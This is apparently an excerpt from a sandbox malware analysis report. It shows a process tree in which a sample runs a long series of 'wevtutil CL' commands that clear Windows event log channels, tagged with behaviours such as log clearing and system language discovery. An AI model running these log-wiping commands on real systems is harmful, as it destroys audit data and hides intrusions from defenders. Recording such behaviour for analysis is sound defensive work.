- System Location Discovery: System Language Discovery
PID:8604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Analytic"3⤵PID:6440
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IE-SmartScreen"3⤵PID:6528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IKE/Operational"3⤵PID:6680
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"3⤵PID:8080
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-Broker/Analytic"3⤵PID:8672
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-CandidateUI/Analytic"3⤵PID:10192
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"3⤵PID:10348
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"3⤵PID:10796
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-JPAPI/Analytic"3⤵PID:7628
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-JPLMP/Analytic"3⤵PID:6228
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-JPPRED/Analytic"3⤵PID:9964
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-JPSetting/Analytic"3⤵PID:9548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-JPTIP/Analytic"3⤵PID:10632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-KRAPI/Analytic"3⤵PID:6496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-KRTIP/Analytic"3⤵PID:6488
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-OEDCompiler/Analytic"3⤵PID:6708
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-TCCORE/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:7240
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-TCTIP/Analytic"3⤵PID:8584
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IME-TIP/Analytic"3⤵PID:7904
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IPNAT/Diagnostic"3⤵PID:10672
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"3⤵PID:6688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Debug"3⤵PID:9412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Operational"3⤵PID:7640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IdCtrls/Analytic"3⤵PID:9708
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IdCtrls/Operational"3⤵PID:11312
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"3⤵PID:6308
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Input-HIDCLASS-Analytic"3⤵PID:11224
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-InputSwitch/Diagnostic"3⤵PID:6840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"3⤵PID:9944
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"3⤵PID:10096
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Operational"3⤵PID:7652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Trace"3⤵PID:8996
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-KdsSvc/Operational"3⤵PID:6436
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kerberos/Operational"3⤵PID:7288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Acpi/Diagnostic"3⤵PID:4712
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/General"3⤵PID:10856
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-AppCompat/Performance"3⤵PID:8120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Analytic"3⤵PID:8092
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Debug"3⤵PID:9772
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-ApphelpCache/Operational"3⤵PID:6908
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Analytic"3⤵PID:10112
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Boot/Operational"3⤵PID:11432
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"3⤵PID:7660
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Disk/Analytic"3⤵PID:4164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Admin"3⤵PID:10048
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-EventTracing/Analytic"3⤵PID:11212
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-File/Analytic"3⤵PID:9976
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-IO/Operational"3⤵PID:8132
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"3⤵PID:11436
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-IoTrace/Diagnostic"3⤵PID:9836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Analytic"3⤵PID:9588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-LiveDump/Operational"3⤵PID:12040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Memory/Analytic"3⤵PID:7320
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Network/Analytic"3⤵
- Clears Windows event logs
PID:6372
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Pdc/Diagnostic"3⤵PID:9364
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Pep/Diagnostic"3⤵PID:11508
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"3⤵PID:10484
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration"3⤵PID:8960
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"3⤵PID:9592
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"3⤵PID:10652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"3⤵PID:10812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-PnP/Driver Watchdog"3⤵PID:9572
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Power/Diagnostic"3⤵PID:11092
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:5968
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Power/Thermal-Operational"3⤵PID:8968
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Prefetch/Diagnostic"3⤵PID:11460
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Process/Analytic"3⤵PID:9132
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"3⤵PID:6388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Analytic"3⤵PID:8248
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-Registry/Performance"3⤵PID:8540
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Debug"3⤵PID:10860
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:7012
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-ShimEngine/Operational"3⤵PID:10772
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Analytic"3⤵PID:9008
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-StoreMgr/Operational"3⤵PID:280
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Analytic"3⤵PID:7336
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Debug"3⤵PID:10836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-WDI/Operational"3⤵PID:6368
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Errors"3⤵PID:292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-WHEA/Operational"3⤵PID:8412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Kernel-XDV/Analytic"3⤵PID:1732
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Admin"3⤵PID:1596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Operational"3⤵PID:11064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-KeyboardFilter/Performance"3⤵PID:11744
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Known Folders API Service"3⤵PID:11392
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-L2NA/Diagnostic"3⤵PID:10872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LDAP-Client/Debug"3⤵PID:10248
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LSA/Diagnostic"3⤵PID:11400
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LSA/Operational"3⤵PID:276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LSA/Performance"3⤵
- System Location Discovery: System Language Discovery
PID:4136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LUA-ConsentUI/Diagnostic"3⤵PID:4168
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Analytic"3⤵PID:12024
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Debug"3⤵PID:872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LanguagePackSetup/Operational"3⤵PID:164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LimitsManagement/Diagnostic"3⤵PID:9196
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"3⤵PID:4500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"3⤵PID:11488
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LiveId/Analytic"3⤵PID:7148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-LiveId/Operational"3⤵PID:304
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"3⤵PID:11296
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MPS-CLNT/Diagnostic"3⤵PID:9568
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MPS-DRV/Diagnostic"3⤵PID:11548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MPS-SRV/Diagnostic"3⤵PID:7984
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MSFTEDIT/Diagnostic"3⤵PID:9028
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MSPaint/Admin"3⤵PID:11836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MSPaint/Debug"3⤵PID:8328
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MSPaint/Diagnostic"3⤵PID:12144
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MUI/Admin"3⤵PID:1684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MUI/Analytic"3⤵PID:11528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MUI/Debug"3⤵PID:11840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MUI/Operational"3⤵PID:11304
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMC"3⤵PID:6804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Media-Streaming/DMR"3⤵PID:11596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Media-Streaming/MDE"3⤵
- Clears Windows event logs
PID:11892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"3⤵PID:7120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"3⤵PID:11272
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"3⤵PID:9816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"3⤵PID:11800
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"3⤵PID:11884
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"3⤵PID:1860
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MemoryDiagnostics-Results/Debug"3⤵PID:6424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Minstore/Analytic"3⤵PID:7084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Minstore/Debug"3⤵
- Clears Windows event logs
PID:11792
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"3⤵PID:6400
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"3⤵PID:11748
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"3⤵PID:11280
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"3⤵PID:11492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"3⤵PID:11684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-MobilityCenter/Performance"3⤵PID:7432
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"3⤵PID:11724
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"3⤵PID:11700
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"3⤵PID:11848
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"3⤵PID:8848
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Mprddm/Operational"3⤵PID:9904
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NCSI/Analytic"3⤵PID:7256
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NCSI/Operational"3⤵PID:10168
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"3⤵PID:10696
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"3⤵PID:6836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NDIS/Diagnostic"3⤵PID:7836
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NDIS/Operational"3⤵PID:10980
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NTLM/Operational"3⤵PID:12204
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NWiFi/Diagnostic"3⤵PID:12112
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Narrator/Diagnostic"3⤵
- Clears Windows event logs
PID:5128
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Ncasvc/Operational"3⤵PID:7636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Diagnostic"3⤵PID:11424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NcdAutoSetup/Operational"3⤵PID:12124
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NdisImPlatform/Operational"3⤵PID:6816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Ndu/Diagnostic"3⤵PID:11956
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetShell/Performance"3⤵PID:12080
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Network-Connection-Broker"3⤵PID:10384
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Network-DataUsage/Analytic"3⤵PID:8084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Network-Setup/Diagnostic"3⤵PID:6504
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"3⤵PID:10044
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkBridge/Diagnostic"3⤵PID:10908
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkLocationWizard/Operational"3⤵PID:6476
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkProfile/Diagnostic"3⤵PID:11544
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkProfile/Operational"3⤵PID:11676
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkProvider/Operational"3⤵PID:11008
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Analytic"3⤵PID:11612
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkProvisioning/Operational"3⤵PID:10076
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkSecurity/Debug"3⤵PID:5972
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NetworkStatus/Analytic"3⤵PID:12200
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Networking-Correlation/Diagnostic"3⤵PID:1908
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"3⤵
- System Time Discovery
PID:3164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NlaSvc/Diagnostic"3⤵PID:12228
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-NlaSvc/Operational"3⤵PID:9704
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Ntfs/Operational"3⤵PID:11816
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Ntfs/Performance"3⤵PID:11944
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Ntfs/WHC"3⤵
- Clears Windows event logs
PID:10628
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OLE/Clipboard-Performance"3⤵PID:8552
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OLEACC/Debug"3⤵PID:724
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OLEACC/Diagnostic"3⤵PID:6604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"3⤵PID:10284
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"3⤵PID:7884
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"3⤵PID:10636
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OOBE-Machine-DUI/Operational"3⤵PID:10292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"3⤵PID:11152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OcpUpdateAgent/Operational"3⤵PID:10468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OfflineFiles/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:11688
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OfflineFiles/Debug"3⤵PID:7212
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OfflineFiles/Operational"3⤵PID:11100
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OfflineFiles/SyncLog"3⤵PID:2856
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OneBackup/Debug"3⤵PID:8476
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OneX/Diagnostic"3⤵PID:7040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OneX/Operational"3⤵PID:6924
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OobeLdr/Analytic"3⤵PID:10576
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-OtpCredentialProvider/Operational"3⤵PID:9296
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PCI/Diagnostic"3⤵PID:9776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Analytic"3⤵PID:10880
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Debug"3⤵PID:7192
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PackageStateRoaming/Operational"3⤵PID:11960
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ParentalControls/Operational"3⤵PID:8852
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Partition/Analytic"3⤵PID:8184
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Partition/Diagnostic"3⤵
- Clears Windows event logs
PID:3728
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"3⤵PID:10008
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PerceptionRuntime/Operational"3⤵PID:10708
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PerceptionSensorDataService/Operational"3⤵PID:11652
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"3⤵PID:8964
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"3⤵PID:8684
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"3⤵PID:6648
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:7928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"3⤵PID:9200
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"3⤵PID:6204
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"3⤵PID:10976
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Certification"3⤵PID:4916
-
-
